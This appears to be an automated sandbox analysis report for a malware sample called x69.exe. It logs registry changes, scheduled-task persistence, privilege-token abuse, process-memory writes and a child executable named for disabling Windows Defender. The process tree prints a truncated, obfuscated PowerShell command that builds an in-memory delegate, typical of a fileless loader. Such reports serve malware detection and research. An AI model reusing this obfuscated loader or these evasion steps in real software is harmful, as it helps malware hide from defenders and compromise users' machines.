\REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\691a0b39-8952-4b84- RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\691a0b39-8952-4b84- = 6438fd7b3dc9db01 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d35f678c-1556-4b5b- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000d891627b3dc9db01a59d107c3dc9db01a59d107c3dc9db01eb7c0a000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000b45aa2212000643766306539616638633462633036623331373235313035373365636639353063663737353962643738306661643738643330346230336431363738623864660000b20009000400efbeb45aa221b45aa2212e0000000000000000000000000000000000000000000000000061228f00640037006600300065003900610066003800630034006200630030003600620033003100370032003500310030003500370033006500630066003900350030006300660037003700350039006200640037003800300066006100640037003800640033003000340062003000330064003100360037003800620038006400660000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000000010f0391000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c64376630653961663863346263303662333137323531303537336563663935306366373735396264373830666164373864333034623033643136373862386466000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000007862626872707a6f000000000000000020b5dd590422d84082839ad7ed2fcdb1ee2f2bb46927f011b50f6aa57399dcbe20b5dd590422d84082839ad7ed2fcdb1ee2f2bb46927f011b50f6aa57399dcbece000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d003300340033003900330036003500330033002d0031003200360032003600330034003900370038002d0031003800360033003800370032003800310032002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000a2211436000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cf51f3bd-3a04-461f- RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d19a1226-0174-486e- RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7bda18bd-8e1b-49b3- RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b5878b52-19ce-4791- = "0" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\eef5bb6d-1f3e-469a- RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6fda03d4-1977-427f- = 9e78b67b3dc9db01 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e64b0ab3-e314-493b- = "0" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\691a0b39-8952-4b84- RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d35f678c-1556-4b5b- RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\92f697d5-1786-4ea2- = ad8e467c3dc9db01 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\92f697d5-1786-4ea2- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a09bfb26-e7c9-47b0- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\691a0b39-8952-4b84- = "\\\\?\\Volume{361421A2-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\32c1033c1063e73bda331eccb913520fcc27c5e3a6ae46ac9db9daad25815e56" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d35f678c-1556-4b5b- = 830b2b7c3dc9db01 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\92f697d5-1786-4ea2- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\92f697d5-1786-4ea2- = "\\\\?\\Volume{361421A2-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\dc7a540c510e51f15f1e52344479a09b42aa587b1ea02dfee89b07ab978e1f1e" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\68b21ce8-3668-4554- = "8324" RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a09bfb26-e7c9-47b0- RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e64b0ab3-e314-493b- = "8324" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\691a0b39-8952-4b84- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\691a0b39-8952-4b84- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000d192437b3dc9db01a4b2e57b3dc9db01a4b2e57b3dc9db01020b08000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000b45aa2212000333263313033336331303633653733626461333331656363623931333532306663633237633565336136616534366163396462396461616432353831356535360000b20009000400efbeb45aa221b45aa2212e0000000000000000000000000000000000000000000000000073fc8700330032006300310030003300330063003100300036003300650037003300620064006100330033003100650063006300620039003100330035003200300066006300630032003700630035006500330061003600610065003400360061006300390064006200390064006100610064003200350038003100350065003500360000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000000010f0391000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c33326331303333633130363365373362646133333165636362393133353230666363323763356533613661653436616339646239646161643235383135653536000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000007862626872707a6f000000000000000020b5dd590422d84082839ad7ed2fcdb1ed2f2bb46927f011b50f6aa57399dcbe20b5dd590422d84082839ad7ed2fcdb1ed2f2bb46927f011b50f6aa57399dcbece000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d003300340033003900330036003500330033002d0031003200360032003600330034003900370038002d0031003800360033003800370032003800310032002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000a2211436000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\68b21ce8-3668-4554- RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\eef5bb6d-1f3e-469a- RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cf51f3bd-3a04-461f- RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6fda03d4-1977-427f- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6fda03d4-1977-427f- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\691a0b39-8952-4b84- = "8324" RuntimeBroker.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3416 schtasks.exe 928 schtasks.exe 2936 schtasks.exe 5052 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 464 x69.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 856 powershell.exe 856 powershell.exe 2260 powershell.exe 2260 powershell.exe 2260 powershell.exe 2300 powershell.exe 2300 powershell.exe 2300 powershell.exe 4676 powershell.exe 4676 powershell.exe 3416 powershell.exe 3416 powershell.exe 4676 powershell.exe 3416 powershell.exe 3760 powershell.exe 3760 powershell.exe 5032 powershell.exe 5032 powershell.exe 3760 powershell.exe 5032 powershell.exe 2020 powershell.exe 2020 powershell.exe 2020 powershell.exe 4684 powershell.exe 4684 powershell.exe 4684 powershell.exe 4888 powershell.exe 4888 powershell.exe 4888 powershell.exe 3884 powershell.exe 3884 powershell.exe 3884 powershell.exe 4336 powershell.exe 4336 powershell.exe 4336 powershell.exe 5052 powershell.exe 5052 powershell.exe 5052 powershell.exe 3288 powershell.exe 3288 powershell.exe 3572 powershell.exe 3572 powershell.exe 3572 powershell.exe 3288 powershell.exe 4192 powershell.EXE 4192 powershell.EXE 3512 powershell.exe 3512 powershell.exe 3512 powershell.exe 3344 powershell.exe 3344 powershell.exe 4872 powershell.exe 4872 powershell.exe 3344 powershell.exe 4872 powershell.exe 1896 powershell.exe 1896 powershell.exe 1896 powershell.exe 5084 powershell.exe 5084 powershell.exe 5084 powershell.exe 4348 powershell.EXE 4348 powershell.EXE 2300 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3528 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2884 x69.exe Token: SeDebugPrivilege 856 powershell.exe Token: SeDebugPrivilege 464 x69.exe Token: SeDebugPrivilege 864 x69.exe Token: SeDebugPrivilege 2260 powershell.exe Token: SeDebugPrivilege 2300 powershell.exe Token: SeDebugPrivilege 3416 powershell.exe Token: SeDebugPrivilege 4676 powershell.exe Token: SeDebugPrivilege 3760 powershell.exe Token: SeDebugPrivilege 5032 powershell.exe Token: SeDebugPrivilege 2020 powershell.exe Token: SeDebugPrivilege 4684 powershell.exe Token: SeDebugPrivilege 4888 powershell.exe Token: SeDebugPrivilege 3884 powershell.exe Token: SeDebugPrivilege 4336 powershell.exe Token: SeDebugPrivilege 5052 powershell.exe Token: SeDebugPrivilege 3288 powershell.exe Token: SeDebugPrivilege 3572 powershell.exe Token: SeDebugPrivilege 4192 powershell.EXE Token: SeDebugPrivilege 3512 powershell.exe Token: SeDebugPrivilege 3344 powershell.exe Token: SeDebugPrivilege 4872 powershell.exe Token: SeDebugPrivilege 1896 powershell.exe Token: SeDebugPrivilege 464 x69.exe Token: SeDebugPrivilege 5084 powershell.exe Token: SeDebugPrivilege 4348 powershell.EXE Token: SeDebugPrivilege 2300 powershell.exe Token: SeDebugPrivilege 2268 powershell.exe Token: SeDebugPrivilege 3736 powershell.exe Token: SeDebugPrivilege 4980 powershell.exe Token: SeDebugPrivilege 2868 powershell.exe Token: SeDebugPrivilege 5032 powershell.exe Token: SeDebugPrivilege 5052 powershell.exe Token: SeDebugPrivilege 3424 powershell.exe Token: SeDebugPrivilege 4268 powershell.exe Token: SeDebugPrivilege 3832 powershell.exe Token: SeDebugPrivilege 3572 powershell.exe Token: SeDebugPrivilege 1520 powershell.exe Token: SeDebugPrivilege 4684 powershell.exe Token: SeDebugPrivilege 2292 powershell.exe Token: SeDebugPrivilege 1928 powershell.exe Token: SeDebugPrivilege 964 powershell.exe Token: SeDebugPrivilege 4676 powershell.exe Token: SeDebugPrivilege 3564 powershell.exe Token: SeDebugPrivilege 4896 powershell.exe Token: SeDebugPrivilege 1520 powershell.exe Token: SeDebugPrivilege 2868 powershell.exe Token: SeDebugPrivilege 4896 powershell.exe Token: SeDebugPrivilege 4192 powershell.EXE Token: SeDebugPrivilege 4348 powershell.EXE Token: SeDebugPrivilege 6124 dllhost.exe Token: SeDebugPrivilege 2636 dllhost.exe Token: SeAuditPrivilege 2704 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2172 svchost.exe Token: SeIncreaseQuotaPrivilege 2172 svchost.exe Token: SeSecurityPrivilege 2172 svchost.exe Token: SeTakeOwnershipPrivilege 2172 svchost.exe Token: SeLoadDriverPrivilege 2172 svchost.exe Token: SeSystemtimePrivilege 2172 svchost.exe Token: SeBackupPrivilege 2172 svchost.exe Token: SeRestorePrivilege 2172 svchost.exe Token: SeShutdownPrivilege 2172 svchost.exe Token: SeSystemEnvironmentPrivilege 2172 svchost.exe Token: SeUndockPrivilege 2172 svchost.exe -
Suspicious use of UnmapMainImage 2 IoCs
pid Process 4024 RuntimeBroker.exe 3528 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2884 wrote to memory of 856 2884 x69.exe 98 PID 2884 wrote to memory of 856 2884 x69.exe 98 PID 2884 wrote to memory of 3416 2884 x69.exe 101 PID 2884 wrote to memory of 3416 2884 x69.exe 101 PID 1004 wrote to memory of 464 1004 cmd.exe 105 PID 1004 wrote to memory of 464 1004 cmd.exe 105 PID 2884 wrote to memory of 864 2884 x69.exe 106 PID 2884 wrote to memory of 864 2884 x69.exe 106 PID 2884 wrote to memory of 2260 2884 x69.exe 107 PID 2884 wrote to memory of 2260 2884 x69.exe 107 PID 2884 wrote to memory of 928 2884 x69.exe 109 PID 2884 wrote to memory of 928 2884 x69.exe 109 PID 2884 wrote to memory of 1848 2884 x69.exe 113 PID 2884 wrote to memory of 1848 2884 x69.exe 113 PID 2884 wrote to memory of 1848 2884 x69.exe 113 PID 2884 wrote to memory of 2300 2884 x69.exe 114 PID 2884 wrote to memory of 2300 2884 x69.exe 114 PID 780 wrote to memory of 2988 780 cmd.exe 116 PID 780 wrote to memory of 2988 780 cmd.exe 116 PID 780 wrote to memory of 2988 780 cmd.exe 116 PID 2988 wrote to memory of 4940 2988 x69Disable-winDefender.exe 117 PID 2988 wrote to memory of 4940 2988 x69Disable-winDefender.exe 117 PID 2988 wrote to memory of 4940 2988 x69Disable-winDefender.exe 117 PID 1848 wrote to memory of 1048 1848 x69Disable-winDefender.exe 118 PID 1848 wrote to memory of 1048 1848 x69Disable-winDefender.exe 118 PID 1848 wrote to memory of 1048 1848 x69Disable-winDefender.exe 118 PID 2988 wrote to memory of 2228 2988 x69Disable-winDefender.exe 119 PID 2988 wrote to memory of 2228 2988 x69Disable-winDefender.exe 119 PID 1848 wrote to memory of 4916 1848 x69Disable-winDefender.exe 120 PID 1848 wrote to memory of 4916 1848 x69Disable-winDefender.exe 120 PID 4916 wrote to memory of 3416 4916 cmd.exe 124 PID 4916 wrote to memory of 3416 4916 cmd.exe 124 PID 2228 wrote to memory of 4676 2228 cmd.exe 125 PID 2228 wrote to memory of 4676 2228 cmd.exe 125 PID 2884 wrote to memory of 2936 2884 x69.exe 126 PID 2884 wrote to memory of 2936 2884 x69.exe 126 PID 2884 wrote to memory of 2524 2884 x69.exe 130 PID 2884 wrote to memory of 2524 2884 x69.exe 130 PID 2884 wrote to memory of 2524 2884 x69.exe 130 PID 2524 wrote to memory of 2956 2524 x69install.exe 132 PID 2524 wrote to memory of 2956 2524 x69install.exe 132 PID 2524 wrote to memory of 2956 2524 x69install.exe 132 PID 2228 wrote to memory of 5032 2228 cmd.exe 165 PID 2228 wrote to memory of 5032 2228 cmd.exe 165 PID 4916 wrote to memory of 3760 4916 cmd.exe 134 PID 4916 wrote to memory of 3760 4916 cmd.exe 134 PID 2456 wrote to memory of 3764 2456 cmd.exe 135 PID 2456 wrote to memory of 3764 2456 cmd.exe 135 PID 2456 wrote to memory of 3764 2456 cmd.exe 135 PID 4916 wrote to memory of 2020 4916 cmd.exe 140 PID 4916 wrote to memory of 2020 4916 cmd.exe 140 PID 2228 wrote to memory of 4684 2228 cmd.exe 172 PID 2228 wrote to memory of 4684 2228 cmd.exe 172 PID 4916 wrote to memory of 4888 4916 cmd.exe 142 PID 4916 wrote to memory of 4888 4916 cmd.exe 142 PID 2228 wrote to memory of 3884 2228 cmd.exe 151 PID 2228 wrote to memory of 3884 2228 cmd.exe 151 PID 464 wrote to memory of 4336 464 x69.exe 144 PID 464 wrote to memory of 4336 464 x69.exe 144 PID 464 wrote to memory of 3572 464 x69.exe 170 PID 464 wrote to memory of 3572 464 x69.exe 170 PID 4916 wrote to memory of 5052 4916 cmd.exe 166 PID 4916 wrote to memory of 5052 4916 cmd.exe 166 PID 2228 wrote to memory of 3288 2228 cmd.exe 149 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:616
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:316
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{56e19c1a-5867-4201-a1b5-6d367e23986d}2⤵
- Suspicious use of AdjustPrivilegeToken
PID:6124
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{6c35e491-12b1-4996-a784-e152c28f1a1b}2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2636
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:956
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:516
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:64
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1040
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1052
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1184
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1192 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2544
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:gwjpPDXdjkay{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$EGyTRphnVKuFwK,[Parameter(Position=1)][Type]$SZhzBExtBK)$anWgFXQPnMo=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+'lec'+'t'+''+'e'+'d'+[Char](68)+''+'e'+''+'l'+''+'e'+''+[Char](103)+''+'a'+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+'Me'+'m'+''+'o'+'r'+'y'+''+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+'e'+'',$False).DefineType('M'+[Char](121)+''+[Char](68)+''+[Char](101)+'le'+[Char](103)+'a'+'t'+''+'e'+''+[Char](84)+''+[Char](121)+'pe','C'+'l'+'ass,'+[Char](80)+''+'u'+''+[Char](98)+'l'+'i'+'c,'+[Char](83)+''+[Char](101)+''+[Char](97)+''+'l'+''+[Char](101)+''+'d'+''+','+'A'+'n'+''+'s'+'i'+'C'+''+[Char](108)+'a'+'s'+''+[Char](115)+''+[Char](44)+''+'A'+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+'C'+''+[Char](108)+''+'a'+'s'+'s'+'',[MulticastDelegate]);$anWgFXQPnMo.DefineConstructor('R'+[Char](84)+''+'S'+'p'+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+'a'+'m'+''+[Char](101)+''+[Char](44)+''+'H'+''+'i'+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+'S'+'i'+'g'+[Char](44)+''+'P'+''+[Char](117)+''+'b'+'l'+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$EGyTRphnVKuFwK).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+'m'+[Char](101)+',M'+'a'+''+[Char](110)+''+[Char](97)+''+'g'+''+'e'+''+'d'+'');$anWgFXQPnMo.Def